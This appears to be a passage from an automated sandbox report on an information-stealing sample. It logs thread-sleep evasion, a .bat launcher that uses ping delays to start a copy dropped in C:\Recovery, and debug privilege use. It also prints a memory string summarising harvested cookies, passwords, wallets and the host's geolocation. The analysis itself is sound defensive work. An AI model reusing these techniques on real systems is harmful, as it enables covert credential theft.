                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -592719s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -592375s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -592106s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -591782s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -591594s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -591385s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -591047s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -590766s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -590578s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -590296s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -590032s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -589782s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -589375s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -589035s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -588797s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -588360s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -588078s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -587735s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -587547s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -587250s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -587031s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -586869s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -586762s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 3244Thread sleep time: -300000s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -586610s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -586488s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -586360s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -586233s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -586125s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -586009s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -585876s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -585735s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -585599s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -585464s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -585330s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -585199s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -585093s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -584985s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -584860s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -584750s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -584641s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -584516s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -584407s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -584282s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -584172s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -584063s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -583938s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -583813s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -583688s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -583563s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -583453s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -583343s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -583235s >= -30000sJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe TID: 1368Thread sleep time: -583125s >= -30000sJump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeCode function: 0_2_00007FFD9B89EC5A GetSystemInfo,0_2_00007FFD9B89EC5A
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 599860Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 598907Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 598594Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 3600000Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 598047Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 597782Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 597453Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 597313Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 597172Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 596860Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 596516Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 596032Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 595766Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 595485Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 595157Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 594860Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 594532Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 593891Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 593532Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 593313Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 593016Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 592719Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 592375Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 592106Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 591782Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 591594Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 591385Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 591047Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 590766Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 590578Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 590296Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 590032Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 589782Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 589375Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 589035Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 588797Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 588360Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 588078Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 587735Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 587547Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 587250Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 587031Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 586869Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 586762Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 300000Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 586610Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 586488Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 586360Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 586233Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 586125Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 586009Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 585876Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 585735Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 585599Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 585464Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 585330Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 585199Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 585093Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 584985Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 584860Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 584750Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 584641Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 584516Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 584407Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 584282Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 584172Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 584063Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 583938Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 583813Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 583688Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 583563Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 583453Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 583343Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 583235Jump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeThread delayed: delay time: 583125Jump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4174435593.0000000001453000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeMemory allocated: page read and write | page guardJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aWMGkikz2Q.bat" Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe "C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe" Jump to behavior
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.0000000003445000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager(
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.0000000003445000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N"},"5.0.4",5,1,"","user","701188","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Recovery","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.189","US
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.0000000003161000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.0000000003445000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.0000000003445000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Crypto Wallets (fff5)":"N","Crypto Extensions (fff5)":"N","Crypto Clients (fff5)":"N","Cookies Count (1671)":"550","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"206","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N"},"5.0.4",5,1,"","user","701188","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Recovery","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.189","US / United States","New York / New York","40.7503 / -74.0014"]
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeQueries volume information: C:\Users\user\Desktop\3e88PGFfkf.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
